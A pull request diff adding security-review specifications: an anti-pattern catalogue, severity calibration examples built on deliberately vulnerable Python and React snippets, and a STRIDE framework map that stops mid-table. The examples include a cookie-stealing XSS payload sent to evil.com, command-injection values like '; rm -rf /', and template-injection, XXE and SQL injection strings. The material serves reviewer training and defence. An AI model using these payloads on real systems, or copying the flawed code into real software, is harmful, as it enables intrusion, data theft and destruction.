### PR TITLE
Add Security domain specification

### DIFF
--- a/spec/README.md
+++ b/spec/README.md
@@ -15,4 +15,5 @@ This file provides guidance on where to find standards and specifications for th
 - Claude Permissions models: https://code.claude.com/docs/en/permissions
 - Claude Sandbox configuration: https://code.claude.com/docs/en/sandboxing
 
-- SRE, Site Reliability Engineering, Availability, Observability, Incident Response, CI/CD, Deployment - ./sre-spec.md
+- SRE, Site Reliability Engineering, Availability, Observability, Incident Response, CI/CD, Deployment - ./sre/spec.md
+- Security, Confidentiality, Privacy, Threat, Vulnerability, Defence, Authorisation, Authentication, Audit - ./sec/spec.md

--- a/spec/sec/anti-patterns.md
+++ b/spec/sec/anti-patterns.md
@@ -1,0 +1,350 @@
+# Anti-Patterns Catalogue — Security Domain
+
+> Complete catalogue of code patterns that Security reviewers should flag. Organised by pillar, with STRIDE classification and typical severity.
+
+## How to use this document
+
+Each anti-pattern includes:
+- **Pattern name** — a short, memorable label
+- **What it looks like** — concrete code description
+- **Why it's bad** — exploitation impact
+- **STRIDE category** — which threat it enables
+- **Typical severity** — default assessment (may be higher or lower depending on context)
+
+When adding new anti-patterns to prompts, follow this structure. Use concrete descriptions with exploit scenarios, not abstract categories.
+
+---
+
+## Authentication & Authorization Pillar Anti-Patterns
+
+### AA-01: Missing authentication on sensitive endpoint
+
+**What it looks like:** Route handler for a sensitive operation (user data, admin functions, financial actions) with no `@login_required`, no auth middleware, no token check.
+
+**Why it's bad:** Any unauthenticated user can perform the operation. If the endpoint is publicly reachable, the attack requires zero effort.
+
+**STRIDE:** Spoofing (no identity verification)
+**Typical severity:** HIGH / HYG (Irreversible if the operation is destructive)
+
+### AA-02: Broken object-level authorization (IDOR)
+
+**What it looks like:** Endpoint accepts an object ID (user_id, doc_id, order_id) and returns/modifies the object without verifying the requesting user has access.
+
+**Why it's bad:** Authenticated users can access or modify any object by iterating or guessing IDs. Data belonging to other users is exposed.
+
+**STRIDE:** Elevation of Privilege (accessing other users' data)
+**Typical severity:** HIGH / L1 (escalates to HYG if the data is regulated — health, financial)
+
+### AA-03: Client-side only access control
+
+**What it looks like:** Admin features hidden by UI elements (`v-if="isAdmin"`, `{isAdmin && <AdminPanel/>}`) but the API endpoints have no server-side authorization check.
+
+**Why it's bad:** Any user who calls the API directly (curl, Postman, browser dev tools) bypasses the UI restriction entirely.
+
+**STRIDE:** Elevation of Privilege (UI-only access control)
+**Typical severity:** HIGH / L1
+
+### AA-04: Weak JWT validation
+
+**What it looks like:** `jwt.decode(token, options={"verify_signature": False})` or accepting `alg: none` tokens.
+
+**Why it's bad:** Attacker forges a JWT with arbitrary claims (any user_id, any role, any permissions). Complete identity takeover.
+
+**STRIDE:** Spoofing (forged identity token)
+**Typical severity:** HIGH / HYG (Irreversible — attacker can take any action as any user)
+
+### AA-05: Hardcoded or default credentials
+
+**What it looks like:** `DB_PASSWORD = "admin123"`, `DEFAULT_API_KEY = "changeme"`, or credentials in Docker Compose files without override.
+
+**Why it's bad:** Default credentials are the first thing attackers try. Tools like Shodan and Censys scan for services with known defaults.
+
+**STRIDE:** Spoofing (trivial authentication bypass)
+**Typical severity:** HIGH / HYG (Irreversible — once credentials are known, attacker has full access)
+
+### AA-06: Session not invalidated on logout
+
+**What it looks like:** Logout handler clears the client cookie but doesn't invalidate the session on the server. Or JWT-based auth with no revocation mechanism.
+
+**Why it's bad:** A stolen session token remains valid even after the user "logs out". If the token was captured (XSS, network sniffing), the attacker maintains access indefinitely.
+
+**STRIDE:** Spoofing (persistent session hijacking)
+**Typical severity:** MEDIUM / L1
+
+### AA-07: Missing re-authentication for sensitive operations
+
+**What it looks like:** Password change, email change, or account deletion uses only the existing session — no password confirmation or MFA step.
+
+**Why it's bad:** A session-hijacked attacker can permanently take over the account by changing credentials. The legitimate user loses access.
+
+**STRIDE:** Elevation of Privilege (session-to-account takeover)
+**Typical severity:** MEDIUM / L1 (escalates to HIGH / HYG if the operation is irreversible — account deletion)
+
+### AA-08: Overly permissive CORS
+
+**What it looks like:** `Access-Control-Allow-Origin: *` combined with `Access-Control-Allow-Credentials: true`.
+
+**Why it's bad:** Any website can make authenticated requests to the API on behalf of the user. Enables cross-site data theft.
+
+**STRIDE:** Spoofing (cross-origin request forgery enabling identity abuse)
+**Typical severity:** MEDIUM / L1
+
+---
+
+## Data Protection Pillar Anti-Patterns
+
+### DP-01: Secrets in source code
+
+**What it looks like:** API keys, passwords, tokens, or connection strings as string literals in source files. `AWS_KEY = "AKIA..."`, `password = "prod_pass_123"`.
+
+**Why it's bad:** Secrets are exposed to anyone with repo access. They persist in git history even after removal. Rotation requires a code change and deploy.
+
+**STRIDE:** Information Disclosure (secrets exposed to all repo readers)
+**Typical severity:** HIGH / HYG (Irreversible — once committed, the secret is in git history permanently)
+
+### DP-02: PII in log output
+
+**What it looks like:** `logger.info(f"User: {email}, SSN: {ssn}")` or logging entire request/response objects that contain user data.
+
+**Why it's bad:** PII in logs is a regulatory violation (GDPR, CCPA, HIPAA). Logs have weaker access controls than databases and are often shipped to third-party services.
+
+**STRIDE:** Information Disclosure (PII exposed via logs)
+**Typical severity:** MEDIUM / HYG (Regulated — PII exposure violates data protection law)
+
+### DP-03: Broken cryptographic algorithm
+
+**What it looks like:** `hashlib.md5(password)`, `DES.new(key)`, `cipher = AES.new(key, AES.MODE_ECB)`.
+
+**Why it's bad:** MD5 and SHA1 are broken for password hashing (rainbow tables, fast GPU cracking). DES is broken (56-bit key). ECB mode reveals patterns in encrypted data.
+
+**STRIDE:** Information Disclosure (data recoverable from weak encryption)
+**Typical severity:** MEDIUM / L1 (escalates to HYG if the data is regulated)
+
+### DP-04: Sensitive data in error responses
+
+**What it looks like:** `return {"error": str(e), "query": sql_query, "stack": traceback.format_exc()}`.
+
+**Why it's bad:** Error responses expose internal implementation details — database schema, file paths, dependency versions. Aids attacker reconnaissance.
+
+**STRIDE:** Information Disclosure (internal details leaked to callers)
+**Typical severity:** MEDIUM / L1 (escalates to HYG if the response contains credentials or PII)
+
+### DP-05: Missing TLS verification
+
+**What it looks like:** `requests.get(url, verify=False)`, `ssl_context.check_hostname = False`.
+
+**Why it's bad:** Disabling TLS verification enables man-in-the-middle attacks. An attacker on the network can intercept and modify all traffic.
+
+**STRIDE:** Information Disclosure + Tampering (traffic intercepted and modified)
+**Typical severity:** MEDIUM / L1
+
+### DP-06: Excessive data in API responses
+
+**What it looks like:** API returns entire database records including fields the client doesn't need — password hashes, internal IDs, admin flags, PII.
+
+**Why it's bad:** Over-fetching exposes sensitive fields to any client. Even if the UI doesn't display them, they're visible in browser dev tools or API logs.
+
+**STRIDE:** Information Disclosure (unnecessary data exposure)
+**Typical severity:** MEDIUM / L1 (escalates to HYG if password hashes or regulated data are included)
+
+### DP-07: Unencrypted sensitive data at rest
+
+**What it looks like:** Passwords stored in plaintext. Credit card numbers stored without encryption. Health records in unencrypted database columns.
+
+**Why it's bad:** Any database access (backup theft, SQL injection, insider threat) exposes all sensitive data. Regulatory violation for PCI-DSS, HIPAA, GDPR.
+
+**STRIDE:** Information Disclosure (data exposed if storage is compromised)
+**Typical severity:** HIGH / HYG (Regulated — plaintext storage of regulated data)
+
+---
+
+## Input Validation Pillar Anti-Patterns
+
+### IV-01: SQL injection via string concatenation
+
+**What it looks like:** `f"SELECT * FROM users WHERE id = {user_id}"` or `"SELECT * FROM users WHERE name = '" + name + "'"`.
+
+**Why it's bad:** Attacker controls the SQL query. Can extract all data (`UNION SELECT`), modify data (`UPDATE/DELETE`), or execute OS commands on some databases (`xp_cmdshell`).
+
+**STRIDE:** Tampering (injection)
+**Typical severity:** HIGH / HYG (Irreversible — data breach or modification)
+
+### IV-02: Command injection via shell execution
+
+**What it looks like:** `os.system(f"convert {filename} output.png")` or `subprocess.call(cmd, shell=True)` with user input.
+
+**Why it's bad:** Attacker achieves remote code execution. Can read files, exfiltrate data, install backdoors, pivot to other systems.
+
+**STRIDE:** Tampering (injection)
+**Typical severity:** HIGH / HYG (Irreversible — arbitrary code execution)
+
+### IV-03: XSS via unsafe rendering
+
+**What it looks like:** `dangerouslySetInnerHTML`, `v-html`, `|safe` filter, `raw()`, `<%- %>` with user content.
+
+**Why it's bad:** Attacker injects JavaScript that runs in other users' browsers. Can steal session cookies, redirect users, deface the page, or perform actions as the victim.
+
+**STRIDE:** Tampering (injection)
+**Typical severity:** HIGH / L1 (escalates to HYG if sessions are not HttpOnly or if the application handles regulated data)
+
+### IV-04: Path traversal
+
+**What it looks like:** `file_path = f"/uploads/{user_filename}"` followed by `open(file_path)` or `send_file(file_path)`.
+
+**Why it's bad:** Attacker sends `../../../etc/passwd` to read arbitrary files. Can access source code, configuration files, credentials, or other users' uploads.
+
+**STRIDE:** Tampering (injection) + Information Disclosure
+**Typical severity:** HIGH / L1 (escalates to HYG if the file system contains credentials or regulated data)
+
+### IV-05: Unsafe deserialization
+
+**What it looks like:** `pickle.loads(request.data)`, `marshal.loads()`, `yaml.load(data)` without safe loader.
+
+**Why it's bad:** Pickle and marshal execute arbitrary code by design. YAML without safe_load can instantiate arbitrary Python objects. No input validation can make these safe.
+
+**STRIDE:** Tampering (injection)
+**Typical severity:** HIGH / HYG (Irreversible — arbitrary code execution)
+
+### IV-06: Template injection
+
+**What it looks like:** `render_template_string(f"<h1>{user_input}</h1>")` or user input in Jinja2/Twig/Freemarker templates.
+
+**Why it's bad:** Attacker sends `{{7*7}}` to test, then `{{config.items()}}` to read config, then `{{''.__class__.__mro__[1].__subclasses__()}}` for RCE.
+
+**STRIDE:** Tampering (injection)
+**Typical severity:** HIGH / HYG (Irreversible — leads to RCE in most template engines)
+
+### IV-07: eval/exec with user input
+
+**What it looks like:** `eval(user_expression)`, `exec(user_code)`, `Function(user_string)()` in JavaScript.
+
+**Why it's bad:** Direct code execution. The attacker's input IS the program. No sanitisation can make this safe.
+
+**STRIDE:** Tampering (injection)
+**Typical severity:** HIGH / HYG (Irreversible — arbitrary code execution)
+
+### IV-08: Regex with user input (ReDoS)
+
+**What it looks like:** `re.match(user_pattern, data)` or regex with nested quantifiers like `(a+)+`.
+
+**Why it's bad:** Crafted input causes exponential backtracking, blocking the thread for seconds to minutes. A form of algorithmic complexity attack.
+
+**STRIDE:** Tampering (injection) — input alters execution time
+**Typical severity:** MEDIUM / L2 (escalates to HYG if in request path without timeout — Total)
+
+### IV-09: XML external entity injection (XXE)
+
+**What it looks like:** XML parsing with external entity resolution enabled. `etree.parse(user_xml)` without disabling DTD processing.
+
+**Why it's bad:** Attacker includes `<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>` to read arbitrary files or make SSRF requests.
+
+**STRIDE:** Tampering (injection) + Information Disclosure
+**Typical severity:** HIGH / L1 (escalates to HYG if the server can reach internal networks — SSRF)
+
+### IV-10: Client-side only validation
+
+**What it looks like:** Input validation in JavaScript/React/Vue but no corresponding server-side validation. Form max-length in HTML but no backend check.
+
+**Why it's bad:** All client-side validation is bypassable. An attacker uses curl, Postman, or browser dev tools to send arbitrary data directly to the API.
+
+**STRIDE:** Tampering (validation bypass)
+**Typical severity:** MEDIUM / L1 (severity depends on what the validation was protecting)
+
+---
+
+## Audit & Resilience Pillar Anti-Patterns
+
+### AR-01: Missing audit log on sensitive operation
+
+**What it looks like:** Data deletion, permission changes, or financial transactions with no logging of who, what, when, why.
+
+**Why it's bad:** No accountability. Malicious insiders or compromised accounts can act without leaving evidence. Incident investigation is impossible.
+
+**STRIDE:** Repudiation (actions are undeniable... except they're not being recorded)
+**Typical severity:** MEDIUM / L2 (escalates to HYG if the operation is on regulated data — Regulated)
+
+### AR-02: Logs modifiable by users
+
+**What it looks like:** Audit logs stored in a database table writable by the application user, or log files in a directory the application process can modify.
+
+**Why it's bad:** An attacker who compromises the application can delete or modify audit logs to cover their tracks.
+
+**STRIDE:** Repudiation (evidence can be destroyed)
+**Typical severity:** MEDIUM / L2
+
+### AR-03: No rate limiting on authentication
+
+**What it looks like:** Login endpoint accepts unlimited requests. No per-IP or per-user throttling. No CAPTCHA after failed attempts.
+
+**Why it's bad:** Enables brute-force password guessing. Automated tools can attempt thousands of passwords per second.
+
+**STRIDE:** Denial of Service + Spoofing (resource exhaustion + credential compromise)
+**Typical severity:** MEDIUM / L1
+
+### AR-04: Unbounded query without pagination
+
+**What it looks like:** `SELECT * FROM table WHERE condition` with `.all()` and no `LIMIT`, on an endpoint without authentication.
+
+**Why it's bad:** Single request can return millions of rows, exhausting database connections and application memory. Trivial DoS.
+
+**STRIDE:** Denial of Service (resource exhaustion)
+**Typical severity:** HIGH / HYG (Total — can render the service unresponsive)
+
+### AR-05: No request size limits
+
+**What it looks like:** API accepts POST requests with no `Content-Length` limit or body size validation.
+
+**Why it's bad:** Attacker sends a 1GB POST body, consuming memory and bandwidth. Multiple concurrent large requests exhaust server resources.
+
+**STRIDE:** Denial of Service (resource exhaustion)
+**Typical severity:** MEDIUM / L2
+
+### AR-06: Missing timeout on external calls
+
+**What it looks like:** `requests.post(url, json=payload)` with no `timeout` parameter. Database queries with no statement timeout.
+
+**Why it's bad:** A hung dependency blocks the calling thread indefinitely. Under failure, all worker threads can be consumed, making the service completely unresponsive.
+
+**STRIDE:** Denial of Service (resource exhaustion via blocking)
+**Typical severity:** HIGH / HYG (Total — if in the request path)
+
+### AR-07: Recursive processing without depth limit
+
+**What it looks like:** JSON/XML parsing without depth limits. Recursive data structures processed without recursion bounds.
+
+**Why it's bad:** Attacker sends deeply nested input (e.g., 10,000 levels of JSON nesting) causing stack overflow or extreme CPU consumption.
+
+**STRIDE:** Denial of Service (algorithmic complexity)
+**Typical severity:** MEDIUM / L2
+
+### AR-08: Audit log missing critical context
+
+**What it looks like:** `logger.info("User action performed")` — logging that something happened but not who, what specifically, or the outcome.
+
+**Why it's bad:** The audit log exists but is useless for investigation. "Something happened" doesn't help determine if it was legitimate.
+
+**STRIDE:** Repudiation (evidence exists but is insufficient)
+**Typical severity:** LOW / L2
+
+### AR-09: Secrets or PII in audit logs
+
+**What it looks like:** `logger.info(f"Login attempt: user={username}, password={password}")` or logging full request bodies that contain tokens.
+
+**Why it's bad:** Audit logs become a security vulnerability themselves — anyone with log access can harvest credentials or PII.
+
+**STRIDE:** Information Disclosure (sensitive data in logs — cross-pillar with data-protection)
+**Typical severity:** MEDIUM / HYG (Regulated if PII, Irreversible if credentials)
+
+---
+
+## Adding New Anti-Patterns
+
+When adding a new anti-pattern to this catalogue or to the prompts:
+
+1. Give it a **short, memorable name** (not "Bad Practice #7")
+2. Describe **what it looks like** in code (concrete, not abstract)
+3. Explain **why it's bad** in terms of exploitation impact (not just "it's insecure")
+4. Include an **exploit scenario** — how would an attacker use this?
+5. Classify with **STRIDE category**
+6. Assign a **typical severity** with reasoning
+7. Note **boundary conditions** that would change the severity

--- a/spec/sec/calibration.md
+++ b/spec/sec/calibration.md
@@ -1,0 +1,348 @@
+# Calibration Examples — Security Domain
+
+> Worked examples showing how to judge severity and maturity level for real code patterns. Use these to calibrate prompt output and verify consistency across reviews.
+
+## How to use this document
+
+Each example shows:
+1. **Code pattern** — what the reviewer sees
+2. **Assessment** — severity, maturity level, STRIDE category, confidence
+3. **Reasoning** — why this severity and level, not higher or lower
+4. **Boundary note** — what would change the assessment up or down
+
+---
+
+## Authentication & Authorization Pillar
+
+### Example AA1: Missing auth check on sensitive endpoint (HIGH / HYG)
+
+**Code pattern:**
+```python
+@app.route('/admin/users', methods=['DELETE'])
+def delete_user():
+    user_id = request.args.get('user_id')
+    User.query.filter_by(id=user_id).delete()
+    db.session.commit()
+    return {"status": "deleted"}, 200
+```
+
+**Assessment:** HIGH | HYG | Spoofing + Elevation | HIGH confidence
+
+**Reasoning:** No authentication or authorization check. Any unauthenticated user can delete any other user by guessing or iterating user IDs. This is a destructive operation with no protection. Irreversible — deleted users can't be recovered without a backup restore.
+
+**Boundary — would be MEDIUM / L1 if:**
+```python
+@app.route('/admin/users', methods=['DELETE'])
+@login_required
+def delete_user():
+    user_id = request.args.get('user_id')
+    User.query.filter_by(id=user_id).delete()  # No check if current user is admin
+```
+Authentication exists but authorization is missing — any logged-in user can delete any user. Still serious, but requires a valid session.
+
+**Boundary — would be LOW / L1 if:**
+```python
+@app.route('/admin/users', methods=['DELETE'])
+@login_required
+@admin_required
+def delete_user():
+    user_id = request.args.get('user_id')
+    # No re-authentication for destructive operation
+```
+Auth and authz exist but missing re-authentication for a sensitive action — a defence-in-depth gap.
+
+### Example AA2: Broken object-level authorization — IDOR (HIGH / L1)
+
+**Code pattern:**
+```python
+@app.route('/api/documents/<doc_id>')
+@login_required
+def get_document(doc_id):
+    doc = Document.query.get(doc_id)
+    return doc.to_dict()
+```
+
+**Assessment:** HIGH | L1 | Elevation of Privilege | HIGH confidence
+
+**Reasoning:** Authenticated users can access any document by changing the `doc_id` parameter. No check verifies that the requesting user owns or has access to the document. This is Insecure Direct Object Reference (IDOR) — a consistently top-ranked OWASP vulnerability.
+
+**Boundary — would be HIGH / HYG if:** The document contains health records, financial data, or other regulated information (Regulated test: yes).
+
+**Boundary — would be MEDIUM / L1 if:** The documents are semi-public (e.g., shared project docs where access control is advisory, not mandatory).
+
+### Example AA3: Weak JWT validation (HIGH / HYG)
+
+**Code pattern:**
+```python
+token = jwt.decode(token_string, options={"verify_signature": False})
+user_id = token['sub']
+```
+
+**Assessment:** HIGH | HYG | Spoofing | HIGH confidence
+
+**Reasoning:** Signature verification is explicitly disabled. An attacker can forge any JWT with any claims — effectively impersonating any user including admins. Irreversible — any action taken under the forged identity has lasting consequences.
+
+**Boundary — would be MEDIUM / L1 if:**
+```python
+token = jwt.decode(token_string, SECRET_KEY, algorithms=["HS256"])
+# But SECRET_KEY is a weak string like "secret" or "changeme"
+```
+Signature is verified but the key is guessable. Requires brute-forcing the key.
+
+---
+
+## Data Protection Pillar
+
+### Example DP1: Secrets in source code (HIGH / HYG)
+
+**Code pattern:**
+```python
+AWS_SECRET_KEY = "AKIAIOSFODNN7EXAMPLE"
+DB_PASSWORD = "production_p@ssw0rd!"
+```
+
+**Assessment:** HIGH | HYG | Information Disclosure | HIGH confidence
+
+**Reasoning:** Production credentials committed to source code. Anyone with repo access (developers, CI systems, contractors) can see these. Once committed, the secret exists in git history permanently even if removed from HEAD. Irreversible — the credential must be rotated.
+
+**Boundary — would be MEDIUM / L1 if:**
+```python
+# In a .env.example file
+AWS_SECRET_KEY=your-key-here
+DB_PASSWORD=your-password-here
+```
+Template file with placeholder values — not actual secrets, but could mislead developers into putting real secrets in `.env` files that get committed.
+
+### Example DP2: PII in logs (MEDIUM / HYG)
+
+**Code pattern:**
+```python
+logger.info(f"User registered: {user.email}, phone: {user.phone}, SSN: {user.ssn}")
+```
+
+**Assessment:** MEDIUM | HYG | Information Disclosure | HIGH confidence
+
+**Reasoning:** PII (email, phone, SSN) written to log output. Logs are typically stored with less access control than databases, retained for long periods, and shipped to third-party log aggregation services. SSN in logs is a regulatory violation (Regulated test: yes). MEDIUM severity (not HIGH) because this requires log access to exploit — not direct external exploitation.
+
+**Boundary — would be HIGH / HYG if:** The logs are shipped to a third-party service without a data processing agreement, or the application serves EU users (GDPR).
+
+**Boundary — would be LOW / L2 if:**
+```python
+logger.info(f"User registered: {mask(user.email)}")
+```
+Email is masked but the log format could benefit from structured fields rather than string interpolation.
+
+### Example DP3: Weak cryptographic algorithm (MEDIUM / L1)
+
+**Code pattern:**
+```python
+import hashlib
+password_hash = hashlib.md5(password.encode()).hexdigest()
+```
+
+**Assessment:** MEDIUM | L1 | Information Disclosure | HIGH confidence
+
+**Reasoning:** MD5 is cryptographically broken for password hashing — rainbow tables exist for common passwords, and GPU cracking is fast. However, exploitation requires first obtaining the hashed passwords (via SQL injection, backup access, etc.), making this a second-order vulnerability. L1 gap — password hashing should use bcrypt, argon2, or scrypt.
+
+**Boundary — would be HIGH / HYG if:** The password hashes are stored in a publicly accessible database or the application has a known SQL injection vulnerability (exploitation path is direct).
+
+**Boundary — would be LOW / L1 if:** MD5 is used for a non-security purpose (file checksums, cache keys) where collision resistance doesn't matter.
+
+---
+
+## Input Validation Pillar
+
+### Example IV1: SQL injection via string concatenation (HIGH / HYG)
+
+**Code pattern:**
+```python
+@app.route('/users')
+def search_users():
+    name = request.args.get('name')
+    query = f"SELECT * FROM users WHERE name = '{name}'"
+    results = db.execute(query)
+    return jsonify(results)
+```
+
+**Assessment:** HIGH | HYG | Tampering (Injection) | HIGH confidence
+
+**Reasoning:** User input is concatenated directly into a SQL query. An attacker can send `name=' OR 1=1 --` to dump all records, or use `UNION SELECT` to extract data from other tables, or use stacked queries to modify/delete data. Trivially exploitable, no authentication required if the endpoint is public. Irreversible if used for data modification or deletion.
+
+**Boundary — would be MEDIUM / L1 if:**
+```python
+@app.route('/users')
+@login_required
+def search_users():
+    name = request.args.get('name')
+    users = User.query.filter(User.name.like(f"%{name}%")).all()
+```
+ORM is used (better), but `like()` with direct string interpolation can still be exploited for wildcard injection. Requires authentication.
+
+### Example IV2: Command injection (HIGH / HYG)
+
+**Code pattern:**
+```python
+@app.route('/convert')
+def convert_file():
+    filename = request.args.get('filename')
+    os.system(f"convert {filename} output.png")
+    return send_file("output.png")
+```
+
+**Assessment:** HIGH | HYG | Tampering (Injection) | HIGH confidence
+
+**Reasoning:** User input passed directly to a shell command. An attacker sends `filename=; rm -rf /` or `filename=; cat /etc/passwd` for RCE. `os.system()` with string formatting is a textbook command injection. Irreversible — arbitrary commands execute with the application's privileges.
+
+**Boundary — would be MEDIUM / L1 if:**
+```python
+subprocess.run(["convert", filename, "output.png"])
+```
+Arguments passed as array (no shell interpretation), but `filename` could still contain path traversal characters.
+
+### Example IV3: XSS via dangerouslySetInnerHTML (HIGH / L1)
+
+**Code pattern:**
+```jsx
+function Comment({ text }) {
+    return <div dangerouslySetInnerHTML={{__html: text}} />;
+}
+```
+
+**Assessment:** HIGH | L1 | Tampering (Injection) | HIGH confidence
+
+**Reasoning:** User-provided text rendered as raw HTML. An attacker submits `<script>document.location='https://evil.com/steal?c='+document.cookie</script>` as a comment. Every user who views the comment has their session cookie stolen. L1 (not HYG) because impact depends on cookie security (HttpOnly flag), CSP headers, and whether sessions are server-side — but the vulnerability itself is clear and exploitable.
+
+**Boundary — would be HIGH / HYG if:** The application handles financial transactions or health data (Regulated), or if session cookies are not HttpOnly (Irreversible — session hijacking).
+
+**Boundary — would be MEDIUM / L1 if:** The content is only visible to the author (self-XSS) or the application has a strong CSP that blocks inline scripts.
+
+### Example IV4: Unsafe deserialization (HIGH / HYG)
+
+**Code pattern:**
+```python
+import pickle
+
+@app.route('/upload', methods=['POST'])
+def upload():
+    data = pickle.loads(request.data)
+    process(data)
+```
+
+**Assessment:** HIGH | HYG | Tampering (Injection) | HIGH confidence
+
+**Reasoning:** `pickle.loads()` on untrusted input is arbitrary code execution by design — pickle can instantiate any Python object, including `os.system("rm -rf /")`. No safe mode exists for pickle. Irreversible — the attacker achieves RCE.
+
+**Boundary — would be MEDIUM / L1 if:**
+```python
+data = yaml.load(request.data)  # Missing Loader argument
+```
+YAML without `safe_load()` can execute arbitrary Python, but requires specific YAML tags — slightly harder to exploit than pickle. Still dangerous.
+
+---
+
+## Audit & Resilience Pillar
+
+### Example AR1: No audit log on destructive operation (MEDIUM / L2)
+
+**Code pattern:**
+```python
+@app.route('/api/users/<user_id>', methods=['DELETE'])
+@login_required
+@admin_required
+def delete_user(user_id):
+    User.query.filter_by(id=user_id).delete()
+    db.session.commit()
+    return {"status": "deleted"}, 200
+```
+
+**Assessment:** MEDIUM | L2 | Repudiation | HIGH confidence
+
+**Reasoning:** A destructive admin operation with no audit trail. No record of who deleted the user, when, or why. If a rogue admin deletes users, there's no evidence. This is an L2 gap (security-relevant actions should produce audit records). MEDIUM because the endpoint has proper auth/authz — the attack requires a compromised admin account.
+
+**Boundary — would be HIGH / HYG if:** The operation deletes regulated data (health records, financial records) where audit trails are legally required (Regulated test: yes).
+
+### Example AR2: No rate limiting on login (MEDIUM / L1)
+
+**Code pattern:**
+```python
+@app.route('/login', methods=['POST'])
+def login():
+    username = request.form['username']
+    password = request.form['password']
+    user = User.query.filter_by(username=username).first()
+    if user and check_password_hash(user.password_hash, password):
+        session['user_id'] = user.id
+        return redirect('/dashboard')
+    return render_template('login.html', error='Invalid credentials')
+```
+
+**Assessment:** MEDIUM | L1 | Spoofing + Denial of Service | HIGH confidence
+
+**Reasoning:** No rate limiting on the login endpoint. An attacker can attempt unlimited password guesses (brute force) to compromise accounts. Also a DoS vector — flooding the login endpoint with requests consumes database query capacity. L1 gap because rate limiting on authentication is a foundational security control.
+
+**Boundary — would be HIGH / HYG if:** The application has no account lockout AND password complexity requirements are weak (Irreversible — compromised accounts can take destructive actions).
+
+**Boundary — would be LOW / L2 if:** Rate limiting exists at the infrastructure level (WAF, API gateway) but isn't visible in the application code — the reviewer should note the caveat.
+
+### Example AR3: Unbounded query on public endpoint (HIGH / HYG)
+
+**Code pattern:**
+```python
+@app.route('/api/search')
+def search():
+    term = request.args.get('q')
+    results = Product.query.filter(Product.name.like(f"%{term}%")).all()
+    return jsonify([r.to_dict() for r in results])
+```
+
+**Assessment:** HIGH | HYG | Denial of Service | HIGH confidence
+
+**Reasoning:** No pagination, no result limit, no authentication. An attacker searches for `%` (matches everything) and the query returns the entire products table. If the table has millions of rows, this exhausts database connections and application memory. Repeated requests can bring down the service. Total test: yes — can render the service unresponsive.
+
+**Boundary — would be MEDIUM / L2 if:** The endpoint requires authentication and the query has a `LIMIT 100` but no pagination (bounded but incomplete).
+
+### Example AR4: ReDoS vulnerability (MEDIUM / L2)
+
+**Code pattern:**
+```python
+import re
+
+@app.route('/validate')
+def validate_email():
+    email = request.args.get('email')
+    pattern = re.compile(r'^([a-zA-Z0-9]+)*@[a-zA-Z0-9]+\.[a-zA-Z]+$')
+    if pattern.match(email):
+        return {"valid": True}
+```
+
+**Assessment:** MEDIUM | L2 | Denial of Service | MEDIUM confidence
+
+**Reasoning:** The regex `([a-zA-Z0-9]+)*` contains a nested quantifier that causes exponential backtracking on inputs like `aaaaaaaaaaaaaaaaaaaaaa!`. An attacker can send a crafted string that takes minutes to evaluate, blocking the worker thread. MEDIUM confidence because the actual impact depends on the regex engine and the input length threshold.
+
+**Boundary — would be HIGH / HYG if:** The endpoint is public, unauthenticated, and the regex is evaluated in the main request-handling thread with no timeout (Total test).
+
+---
+
+## Cross-pillar: How the same issue gets different assessments
+
+### Hardcoded API key — assessed by different pillars
+
+The same `API_KEY = "sk-1234567890abcdef"` in source code might be flagged by:
+
+| Pillar | STRIDE | Emphasis |
+|--------|--------|----------|
+| **authn-authz** | Spoofing | "Anyone with repo access can use this key to authenticate as the service" |
+| **data-protection** | Information Disclosure | "Secret exposed in source code, accessible to all repo readers, persists in git history" |
+
+**During synthesis:** These merge into one finding. The data-protection assessment typically takes precedence (the key is exposed regardless of whether it's used for auth). The recommendation combines: "Move the key to environment variables or a secret manager (data-protection), and scope the key's permissions to minimum required (authn-authz)."
+
+### Missing rate limiting on auth endpoint — assessed by different pillars
+
+The same unprotected `/login` endpoint might be flagged by:
+
+| Pillar | STRIDE | Emphasis |
+|--------|--------|----------|
+| **authn-authz** | Spoofing | "Unlimited password attempts enable brute-force account compromise" |
+| **audit-resilience** | Denial of Service | "Unlimited requests to the login endpoint can exhaust database connection pool" |
+
+**During synthesis:** These merge into one finding with both STRIDE categories noted. The recommendation addresses both: "Add rate limiting per-IP and per-user (prevents brute force and resource exhaustion), implement account lockout after N failures (prevents account compromise), log failed attempts for detection (audit trail)."

--- a/spec/sec/framework-map.md
+++ b/spec/sec/framework-map.md
@@ -1,0 +1,139 @@
+# Framework Map — STRIDE, Security Properties, and Pillars
+
+> How the Security domain frameworks relate to each other. Use this map when writing or reviewing prompts to ensure coverage is complete and lenses are applied correctly.
+
+## The Duality: STRIDE attacks, Properties defend
+
+Every STRIDE threat category has a corresponding security property that mitigates it. When a reviewer identifies a STRIDE threat, they should recommend strengthening the corresponding security property.
+
+| STRIDE threat | Security property | Pillar | Why this pairing |
+|---------------|------------------|--------|-----------------|
+| **S**poofing | **Authenticity** | authn-authz | Spoofing impersonates users; authenticity (strong authentication, credential protection) verifies identity. |
+| **T**ampering | **Integrity** | input-validation + data-protection | Tampering modifies data/behaviour; integrity (input validation, checksums, parameterised queries) ensures data is unaltered. Shared across two pillars — see boundary rules below. |
+| **R**epudiation | **Non-repudiability** | audit-resilience | Repudiation denies actions; non-repudiability (audit trails, tamper-evident logs) provides proof. |
+| **I**nformation Disclosure | **Confidentiality** | data-protection | Information disclosure exposes secrets; confidentiality (encryption, access control, masking) keeps data hidden. |
+| **D**enial of Service | **Availability** | audit-resilience | DoS disrupts service; availability (rate limiting, resource bounds, abuse prevention) maintains access. |
+| **E**levation of Privilege | **Authorization** | authn-authz | Elevation grants unearned access; authorization (RBAC, least privilege, access control) restricts access. |
+
+### Using the duality in reviews
+
+When writing a finding:
+1. Identify the **STRIDE category** (what can the attacker do?)
+2. Check the **Security property** (what should protect against it?)
+3. If the property is missing or insufficient, that's the finding
+4. The recommendation should describe the security property to strengthen, not a specific technique
+
+Example:
+- STRIDE: Tampering (SQL injection on line 47)
+- Property needed: Integrity (parameterised queries)
+- Finding: "User input concatenated directly into SQL query enables arbitrary data extraction"
+- Recommendation: "Use parameterised queries or prepared statements to separate data from commands"
+
+## The Tampering Boundary
+
+Tampering is the only STRIDE category split across two pillars. This is deliberate — injection attacks and data integrity violations are distinct concern types that require different expertise.
+
+| Concern | Pillar owner | What to look for |
+|---------|-------------|-----------------|
+| **Injection** (untrusted input alters behaviour) | input-validation | SQL injection, command injection, XSS, path traversal, template injection, deserialization attacks |
